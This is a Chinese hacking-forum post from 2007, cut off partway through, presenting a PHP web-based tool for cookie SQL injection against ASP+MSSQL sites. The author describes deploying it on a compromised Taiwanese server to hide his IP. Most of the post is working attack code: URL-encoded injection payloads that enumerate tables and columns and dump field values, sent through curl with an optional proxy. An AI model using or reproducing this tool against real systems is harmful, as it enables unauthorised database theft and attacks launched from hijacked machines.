[原创]MSSQL cookie注入工具 web版

mika

技术核心组

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 173
精华: 16
积分: 4224
阅读权限: 200
性别: 女
在线时间: 346 小时
注册时间: 2006-7-7
最后登录: 2008-8-27

发短消息
加为好友
当前离线

楼主大中小发表于 2007-9-25 19:12 只看该作者

[原创]MSSQL cookie注入工具 web版

文章作者：Mika[EST]
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

俺前些日子发的那个cookie注入辅助工具php版，由于是命令行下解析执行的，所以一般都只能在本机执行（在肉鸡上你需要安装php解释器），用起来也不方便。而且输出的信息也比较难看。正好前些日子做测试的时候，俺抓到一只台湾鸡，支持php。于是俺就想把这个工具写成web版的，放到肉鸡上去执行，这样既能节省本机资源，而且又比较隐蔽（能隐藏自己的IP，而且可以访问到GFW不让你访问的站），对我唯一的难处就是我不太懂html，上学的时候学的都是用dreamweaver做个简单的网页。但是现在我一没有dreamweaver，二没有frontpage，只好从网上下载了一个html的参考手册，一边看一边改写的！花了俺整整一天的时间，所以没有功劳还有苦劳呢，你们看完可要支持一下啊

俺直接贴代码了，对你们来说应该不难的：

Code Language : PHP

<?php
$auth_ok=0;
$user=$_SERVER['PHP_AUTH_USER'];
$pass=$_SERVER['PHP_AUTH_PW'];
if(isset($user) && isset($pass) && $user=='admin' && $pass=='mika520'){
$auth_ok=1;
}
if(!$auth_ok)
{
header('WWW-Authenticate: Basic realm=\"Top Secret Area\"');
header('HTTP/1.0 401 Unauthorized');
exit;
}
$cookie=$_POST['_cookie'];
$referer=$_POST['_referer'];
$url=$_POST['_url'];
$t_name=$_POST['_tablename'];
$tab_name=$_POST['_tabname'];
$field_name=$_POST['_fieldname'];
$proxy=$_POST['_proxy'];
$useproxy=$_POST['_useproxy'];
$_action=$_POST['_action'];
$_btype=$_POST['_btype'];
?>
<html>
<head>
<title>Asp+Mssql Cookie Sql Injection Tool</title>
<style>body{font-family:trebuchet ms;font-size:16px;color:green;background-color:black}hr{width:100%;height:2px;}</style>
</head>
<body>
<center><h1>Asp+Mssql Sql Cookie Injection Tool Beta 1 by Mika[EST]</h1></center>
<hr><hr>
<form action=\"<?=$_SERVER['PHP_SELF']?>\" method=\"POST\">
<center>
<table>
<tr><td><b>Exploitable Url: </b><input type=\"text\" name=\"_url\" size=60 value=\"<?=$url?>\" /><?php if(isset($url) && empty($url)) echo \"<font color=red> unspecified</font>\n\"?></td></tr>
<tr><td><b>Exploitable Cookie: </b><input type=\"text\" name=\"_cookie\" size=60 value=\"<?=$cookie?>\" /><?php if(isset($cookie) && empty($cookie)) echo \"<font color=red> unspecified</font>\n\"?></td></tr>
<tr><td><b>Referer Url: </b><input type=\"text\" name=\"_referer\" size=60 value=\"<?=$referer?>\" /><?php if(isset($referer) && empty($referer)) echo \"<font color=red> unspecified</font>\n\"?></td></tr>
<tr><td><input type=\"radio\" name=\"_btype\" value=\"num\" <?php if (empty($_btype) || $_btype==\"num\") echo \"checked\";?>>Num Type</input> <input type=\"radio\" name=\"_btype\" value=\"char\" <?php if ($_btype==\"char\") echo \"checked\";?>>Char Type</input></td></tr>
<tr><td><input type=\"radio\" name=\"_action\" value=\"exp_tabs\" <?php if(empty($_action) || $_action==\"exp_tabs\") echo \"checked\" ?> onclick=\"_tablename.disabled=true;_fieldname.disabled=true;_tabname.disabled=true;\">Explode Tables Of Current DataBase</input></td></tr>
<tr><td><input type=\"radio\" name=\"_action\" value=\"exp_fields\" onclick=\"_tablename.disabled=false;_fieldname.disabled=true;_tabname.disabled=true;\" <?php if($_action==\"exp_fields\") echo \"checked\"?>>Explode Fields Of </input><input type=\"text\" name=\"_tablename\" size=30 value=\"<?php if(!empty($tab_name)) echo $tab_name; else echo $t_name;?>\" <?php if($_action != \"exp_fields\") echo \"disabled\";?> /></td></tr>
<tr><td><input type=\"radio\" name=\"_action\" value=\"exp_values\" onclick=\"_tablename.disabled=true;_fieldname.disabled=false;_tabname.disabled=false;\" <?php if($_action==\"exp_values\") echo \"checked\"?>>Explode Values Of </input><input type=\"text\" name=\"_fieldname\" size=30 value=\"<?=$field_name?>\" <?php if($_action != \"exp_values\") echo \"disabled\";?>/> IN <input type=\"text\" name='_tabname' size=20 value=\"<?php if(!empty($t_name)) echo $t_name; else echo $tab_name;?>\" <?php if($_action != \"exp_values\") echo \"disabled\";?> /></td></tr><br>
<tr><td><input type=\"checkbox\" name=\"_useproxy\" value=\"use_proxy\" onclick=\"javascript:if(this.checked==true){_proxy.disabled=false;}else {_proxy.disabled=true;}\" <?php if(isset($useproxy) && !empty($proxy)) echo \"checked\";?>>Via Anonymous Proxy <input type=\"text\" name=\"_proxy\" size=30 value=\"<?=$proxy?>\" <?php if(empty($proxy)) echo \"disabled=true\";?> ></input></td></tr>
<tr><td><input type=\"submit\" name=\"_submit\" value=\"Launch Attack\"></input><?php echo str_repeat(' ',50);?><input type=\"reset\" name=\"_reset\" value=\"Reset Attack\"></input></td></tr>
</table>
</center>
</form>
<hr><hr>
<?php
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
global $curl,$referer,$cookie,$url,$table_name,$field_name,$t_name,$tab_name;
$tab_exp=\"%20and%201=(select%20top%201%20nchar(124)%2bname%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85)%20and%20name%20not%20in(MFM_TABLES))--\";
$field_exp=\"%20and%20(select%20top%201%20nchar(124)%2Bcol_name(object_id(TABLE_NAME),MFM_NUM)%2Bnchar(124)%20from%20sysobjects)%3E0--\";
$value_exp=\"%20and%20(select%20top%201%20nchar(124)%2Bcast(MFM_FIELD_NAME%20as%20varchar(8000))%2Bnchar(124)%20from%20MFM_TABLE_NAME%20where%20MFM_FIELD_NAME%20not%20in(MFM_VALUE))%3E0--\";
$count_exp=\"%20and%20(select%20nchar(124)%2Bcast(%20count(*)%20as%20varchar(255))%2bnchar(124)%20from%20MFM_TABLE_NAME)%3E0--\";
$count_table=\"%20and%201=(select%20top%201%20nchar(124)%2bcast(count(*)%20as%20varchar(8000))%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85))--\";
$count_column=\"%20and%201=(select%20nchar(124)%2Bcast(count(*)%20as%20varchar(8000))%2Bnchar(124)%20from%20syscolumns%20where%20id=object_id(MFM_TABLE_NAME))--\";
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
if(array_key_exists(\"_submit\",$_POST) && !empty($url) && !empty($cookie) && !empty($referer)){
$bstr=$_POST['_btype'];
$action=$_POST['_action'];
echo \"<div align=left><b>:::Attack Parameters:::</b><br>\n\";
echo \"<b>Target Url:</b><font color=blue>$url</font><br>\n\";
echo \"<b>Target Cookie:</b><font color=blue>\\"$cookie\\"</font><br>\n\";
echo \"<b>Referer Url:</b><font color=blue>$referer</font><br>\n\";
echo \"<b>Injection Type:</b>\";
switch($bstr){
case 'num':
echo \"<font color=blue>number</font><br>\n\";
$bstr=0;//数字型
break;
case 'char':
echo \"<font color=blue>character</font><br>\n\";
$bstr=1;//字符型
break;
}
echo \"<b>Via Proxy:</b>\".((isset($useproxy) && !empty($proxy))? '<font color=blue>Yes</font>':'<font color=blue>No</font>').\"<br>\n\";
if(isset($useproxy) && !empty($proxy))
echo \"<b>Proxy Address:</b><font color=blue>$proxy</font><br>\n\";
echo \"<b>Injection Action:</b>\";
switch($action){
case 'exp_tabs':
echo \"<font color=blue>Explode Table Names</font><br>\n</div>\n\";
exploit_tab();
break;
case 'exp_fields':
echo \"<font color=blue>Explode Table Fields</font><br>\n\";
if(empty($t_name))
die(\"<font color=red>Error:table name must be specified!</font><br>\");
$table_name=$t_name;
echo \"<b>Table Name:</b><font color=blue>$table_name</font><br>\n</div>\n\";
exploit_field();
break;
case 'exp_values':
echo \"<font color=blue>Explode Table Values</font><br>\n\";
if(empty($tab_name))
die(\"<font color=red>Error:table name must be specified!</font><br>\");
elseif(empty($field_name))
die(\"<font color=red>Error:field name must be specified!</font><br>\");
$table_name=$tab_name;
echo \"<b>Table Name:</b><font color=blue>$table_name</font><br>\n\";
echo \"<b>Fields Name:</b><font color=blue>\".str_replace(\",\",\" \",$field_name).\"</font><br>\n</div>\n\";
explode_value();
break;
}
}
// exploit_tab();
// exploit_field();
// explode_value();
///////////////////////////////////////////////////////////////////////////////////////
function output_start()
{
echo \"<hr><br>\n\";
echo \"<div align=center>\n\";
echo \"<table border=\\"1\\">\n\";
flush();
}
function output_th($th)
{
switch($th){
case 'tr':
echo \"<tr>\";
break;
case '/tr':
echo \"</tr>\n\";
break;
default:
echo \"<th><font color=blue>$th</font></th>\n\";
break;
}
flush();
}
function output_td($td)
{
switch($td){
case 'tr':
echo \"<tr>\";
break;
case '/tr':
echo \"</tr>\n\";
break;
default:
echo \"<td><font color=blue>$td</font></td>\n\";
break;
}
flush();
}
function output_end()
{
echo \"</table></div><br>\n\";
flush();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//暴取字段值函数
function explode_value()
{
global $bstr,$table_name,$field_name,$cookie,$count_exp,$curl;
$i=1;
$count=0;
$fields=explode(\",\",$field_name);
$sql_str=\" And (Select Top 1 nchar(124)\";
$sub_str='+isNull(cast([MIKA_FIELD] as varchar(8000)),char(32))';
foreach($fields as $field){
$new_sub_str=str_replace('MIKA_FIELD',$field,$sub_str);
$sql_str.=$new_sub_str.\"+char(92)\";
}
$sql_str=substr($sql_str,0,strlen($sql_str)-9);
$sql_str.=\"+nchar(124) from (Select Top MIKA_NUM $field_name From [MIKA_TABLE] Where 1=1 Order by $field_name) T Order by \";
$sub_str=\"MIKA_FIELD desc\";
foreach($fields as $field){
$sub_strs[]=str_replace('MIKA_FIELD',$field,$sub_str);
}
$sql_str.=implode(\",\",$sub_strs).\")>0--\";
//echo $sql_str.\"\n\";
$sql_str=str_replace('MIKA_TABLE',$table_name,$sql_str);
$old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp);
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$old,$cookie);
else
$new_cookie=str_replace('MIKA',$old,$cookie);
output_start();
$re=find_value($new_cookie);
if($re)
{
$count=$re;
echo \"<b>the number of record in $table_name:</b> <font color=blue>$count</font>\n\";
}
output_th('tr');
foreach ($fields as $field){
output_th($field);
}
output_th('/tr');
do{
$new_sql_str=str_replace('MIKA_NUM',$i,$sql_str);
//echo $sql_str.\"\n\";
if($bstr)
$new_cookie=str_replace('MIKA','%27'.urlencode($new_sql_str),$cookie);
else
$new_cookie=str_replace('MIKA',urlencode($new_sql_str),$cookie);
$re=find_value($new_cookie);
output_td('tr');
if($re)
{
$res=explode(\"\\\",$re);
foreach($res as $ree){
output_td($ree);
}
}
output_td('/tr');
$i++;
}while($i<=$count);
output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//另一种方式暴取表名的函数
function explode_tab(){
global $bstr,$curl,$cookie;
$num=1;
$i=0;
$old_re=\"\";
$re=\"\";
$words=\" And (Select Top 1 nchar(124)+cast(name as varchar(8000))+nchar(124) from(Select Top MIKA_NUM id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0--\";
init_session();
output_th('tr');
for($i=0;$i<8;$i++)
output_th('Tables');
output_th('/tr');
output_td('tr');
do{
$new_words=str_replace('MIKA_NUM',$num,$words);
if($bstr)
$new_cookie=str_replace('MIKA',\"%27\".urlencode($new_words),$cookie);
else
$new_cookie=str_replace('MIKA',urlencode($new_words),$cookie);
$re=find_value($new_cookie);
if($re!=$old_re)
{
output_td($re);
if(($num % 8)==0)
{
output_td('/tr');
output_td('tr');
}
}
else
break;
$old_re=$re;
$num++;
}while($re);
output_td('/tr');
output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//初始化会话函数
function init_session(){
global $proxy,$curl,$referer,$url;
$curl=curl_init();
curl_setopt($curl,CURLOPT_HEADER,0);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_REFERER,$referer);
curl_setopt($curl,CURLOPT_URL,$url);
if(isset($useproxy) && !empty($proxy))
curl_setopt($curl,CURLOPT_PROXY,\"$proxy\");
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//通用取值函数
function find_value($cookie){
global $curl;
//echo $cookie.\"\n\";
curl_setopt($curl,CURLOPT_COOKIE,$cookie);
$content=curl_exec($curl);
//echo $content;
$re=preg_match(\"/(\|.+